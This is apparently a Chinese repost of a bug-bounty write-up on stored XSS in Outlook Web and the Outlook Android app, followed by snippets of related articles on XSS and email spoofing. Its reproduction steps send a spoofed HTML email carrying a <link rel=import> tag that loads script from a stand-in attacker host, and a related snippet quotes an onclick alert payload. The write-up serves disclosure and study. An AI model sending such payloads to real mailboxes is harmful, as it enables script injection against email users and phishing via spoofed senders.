Outlook中的存储型XSS——网页版和安卓版均受影响

最新推荐文章于 2023-07-18 11:08:29 发布
翻译 最新推荐文章于 2023-07-18 11:08:29 发布 · 584 阅读 · 0
文章标签:

#安全 #outlook

作者发现Outlook在处理HTML内容时存在XSS漏洞,通过利用未过滤的link标签,成功在网页和Android应用中注入外部JS代码,实现弹框攻击。

22.jpg

大家好,这是我第一次写漏洞文章,也是我发现的第一个Outlook漏洞。

在很多网络消息服务中,例如Gmail、Outlook、Yahoo等,都允许接受并渲染电子邮件中的HTML内容(Content-Type: text/html),但同时也会进行安全限制,只允许AH1img等标签。

而当我测试Outlook中的安全过滤机制时,发现link标签并不会被过滤。这就让我有机可乘,成功引入了外部JS代码,实现了弹框。

复现步骤

  1. 进入网站[https://emkei.cz/](https://emkei.cz/),这个网站的能直接设置发送的电子邮件的内容的类型。

  2. 随机往邮件主题、发件人和发件地址填入字符。

  3. 往收件人地址填入你需要测试的电子邮件地址。

  4. Content-Type设定为text/html

  5. 邮件正文填入<link rel=import href=[https://Evilcom/filepayload](https://Evilcom/filepayload)>,点击提交。

  6. 登入收件电子邮箱,点击查看消息,payload就会成功执行!

以下为PoC视频地址:

https://youtu.be/khsLfQwy1ik

33.png

44.png

55.png

Android版漏洞

在第一个漏洞被修复后,我下载了对应的Android版本,尝试使用相同的方法进行攻击。结果发现手机端应用的缺陷更大,直接插入了payload,成功弹框。

66.png

77.png

88.png

感谢你的阅读!

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/3230.html
来源:https://medium.com/@elmrhassel/xss-stored-on-outlook-web-outlook-android-app-ad4bd46b8823
DVWA系列之XSS(跨站脚本攻击)——存储XSS源码分析及漏洞利用
7Riven's blog
11-27 1570
存储XSS 存储XSS持久化,代码是存储在服芻器中的,如在个人信息或发表文章等地方,插入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户每次访问该页面的时候都会触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃 cookie 1、hack插入恶意js 2、服务器返回含有恶意js页面 3、由于恶意js会一直存储在服务器端,所以每个目标点击含有恶意js页面都会跳转到第三方...
存储XSS灰盒测试-01
09-15
在这个课程中,我们将学习如何进行存储XSS的灰盒测试,灰盒测试是一种结合黑盒测试白盒测试的方法,可以模拟攻击者的攻击行为,检测Web应用程序中的缺陷。 环境搭建 在进行存储XSS测试之前,我们需要搭建一...
存储xss_五分钟内获得1000美金——OUTLOOK.COM的存储XSS
weixin_39565300的博客
12-06 134
大家好!这篇文章我将讲述一个Microsoft旗下网站的XSS漏洞。有时候,深究一下程序背后的运行流程可能会对你挖掘漏洞有很大的帮助。我强烈推荐大家都试试Miscrosoft的漏洞悬赏计划,根据我的体验,他们的安全团队比其他大公司的都要靠谱很多。现在,让我们开始吧。我通过微软的office(ppt)文件,发现了一个可在iOS浏览器利用的outlook.live.com网站存储XSS漏洞。POC1...
xss植入_微软Outlook for Android移动应用的XSS漏洞分析
weixin_33623304的博客
12-22 459
今天分享的Writeup是关于Outlook for Andriod的存储XSS漏洞,作者通过朋友发来的技术邮件偶然发现了该漏洞,历经长达几个月的复现构造,最终微软承认了该漏洞(CVE-2019-1105)。漏洞发现原因2018年底的时候,我一个朋友发邮件请我帮忙分析他在研究的一些JavaScript代码,虽然我不做漏洞挖掘,但他发过来的邮件在我的手机上显示出了一些奇怪的东西。我手机是...
手机outlook刷新不出邮件_Outlook中的存储XSS——网页版安卓版均受影响
weixin_39625337的博客
12-15 1834
大家好,这是我第一次写漏洞文章,也是我发现的第一个Outlook漏洞。在很多网络消息服务中,例如Gmail、Outlook、Yahoo等,都允许接受并渲染电子邮件中的HTML内容(Content-Type: text/html),但同时也会进行安全限制,只允许A、H1、img等标签。而当我测试Outlook中的安全过滤机制时,发现link标签并不会被过滤。这就让我有机可乘,成功引入了外部JS代码,...
支付宝提示服务器有【中危漏洞】任意邮件伪造检测
勤劳的执着的运维农民工
11-19 4305
​ 使用Bugscan检测到我自己的网站有这个漏洞后,我费了好一番功夫来查找资料,终于是解决了这个问题。在此把经验分享出来,主要觉得这方面中文资料太少了。 ​ 检测到你的服务器存在邮件伪造的时候,你可能还在疑惑:这到底是什么东西?有什么危害?我有什么关系? ​ 这里就不再细说邮件伪造的始末。遇到问题大家最关心的是解决方案。此处将主要围绕解决方案来说,文本旨在读者看后能得到一个正常运行的设置。 首先,如何验证邮件伪造? ​ 解决对邮件伪造的疑惑,这里有一个在线的测试网站:https://emke
钓鱼邮件从入门到放弃
tomyyyyy
12-06 1万+
目录钓鱼邮件从入门到放弃一、钓鱼邮件的基本概念1.1 钓鱼邮件的伪造方式1.1.1 购买域名搭建邮箱服务器1.1.2 伪造发件人1.2 三个邮件安全协议1.2.1 SPF1.2.2 DKIM1.2.3 DMARC1.3 钓鱼邮件的利用方式1.3.1 链接钓鱼邮件1.3.2 附件钓鱼邮件1.3.3 鱼叉式钓鱼邮件1.3.4 BEC钓鱼邮件1.3.5 二维码钓鱼邮件二、钓鱼环境的搭建2.1 网站克隆...
精选资源
奇安信安全扫描漏洞解决路径遍历存储xss反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储跨站脚本(Stored Cross-Site Scripting,简称存储XSS漏洞。这种漏洞允许...
存储Xss成因及挖掘方法
02-21
存储Xss成因及挖掘方法
第04篇:在线邮件伪造网站临时邮件1
08-03
第三方邮件厂商:邮件黑名单查询测试你发出邮件的垃圾邮件匹配度在线发送邮件:临时邮箱。
JAVA ik es_php环境下使用elasticSearch+ik分词器进行全文搜索_后端开发
weixin_28927031的博客
02-23 706
php 过滤存储XSS攻击_后端开发最近做的项目被测试测出了存在存储XSS,至此记录一下,问题出在了 input 框 :payload:"a" οnclick=alert(1)>也做了一些XSS过滤,但是不全,有从网上找了一些,弄了一个简单粗暴的。首先需要说明的一点是,如果需要启用ik分词器,那么分词器的版本必须与es版本一致,即6.3.0的分词器需要同样6.3.0版本的es支持。安装j...
邮箱伪造之搭建匿名SMTP服务器
05-13 8868
电子邮件欺骗(email spoofing)的根本原因是SMTP协议是不需要身份验证的,攻击者可以利用这个特性伪造电子邮件头,从任意电子邮件地址发送任何人,导致信息看起来来源于某个人或某...
域名下配置,dns TXT记录,防止任意邮件伪造
有一棵树的博客
07-18 1691
域名下配置,dns TXT记录,防止任意邮件伪造
经常去的src平台、学习用到的国内外网站
licheric的博客
10-13 1万+
SRC众测平台 国际漏洞提交平台 https://www.hackerone.com/ BugX区块链漏洞平台 http://www.bugx.org/ Gsrc瓜子src https://security.guazi.com/ 区块链安全响应中心 https://dvpnet.io/ CNVD国家信息安全漏洞平台 http://www.cnvd.org.cn/ 漏洞银行:https://www.bugbank.cn/ 360补天:https://www.butian.net/ 教育行业漏洞报告平台(Bet
邮箱伪造详解
weixin_34345753的博客
07-16 1675
0x00 背景 邮箱伪造技术,可被用来做钓鱼攻击。 即伪造管理员或者IT运维部等邮箱发邮件,获取信任使对方打开附带的木马文件或者回复想要获取的敏感资料等。 0x01 细节 SMTP协议中,允许发件人伪造绝大多数的发件人特征信息。 这就导致了可以伪造别人发送邮件。 来看一下乌云上的案例: WooYun: ifeng exchange伪造源地址漏洞 WooYun: 腾讯邮箱...
Office 2010: outlook中设置邮件格式为HTML、RTF、纯文本
热门推荐
To Kown To Do
11-19 6万+
所有的电子邮件应用程序都不相同,因此您需要使用收件人的应用程序支持的邮件格式。Microsoft Outlook 提供了灵活的邮件格式,以满足不同情况下的需要。所选择的邮件格式决定了您是否可以添加带格式文本(如粗体、彩色字体项目符号)以及是否可以将图片添加到邮件正文中。不过,仅仅选择可以让您添加这些功能的邮件格式并不表示收件人将能看到这些功能。这是因为一些电子邮件应用程序不支持带格式的邮件或图片
制作HTML邮件邮箱注意问题解决方案--兼容手机邮箱、电脑邮箱邮件客户端
ccbill的博客
08-23 4498
邮件发展多年,一直是很多人沟通联系推广业务的主要工具,很多大公司都会发HTML邮件,因为HTML邮件比普通文本邮件更吸引人,震撼力更强。 但作为一名普通员工,我们如果自己制作一封这样的HTML邮件,实在是费事费力不讨好。 ...
mockfake的区别
老高的专栏
11-02 5964
fake:说话,讲真话; mock: adj. 模拟的; 仿制的; 虚假的; 不诚实的; 今天看到一位大牛的测试框架中提到fake,特查阅了一下。 mock对象是指对外面依赖系统的模拟,在运行时刻可以根据假设的需求提供期望的结果。fake对象是一种虚假的实现,内部使用了固定的数据或逻辑,只能返回特定的结果。 fack是一种实体的模拟,而moc
jsoup 中文 API 文档发布——网页版在线便捷浏览
描述中的网页版,方便查看”意味着这份API文档是以网页的形式存在的,用户可以通过浏览器来查看。这比传统的PDF或者Word格式的文档更加方便,特别是在需要实时搜索或快速跳转到特定API时。通过网页版的文档,用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值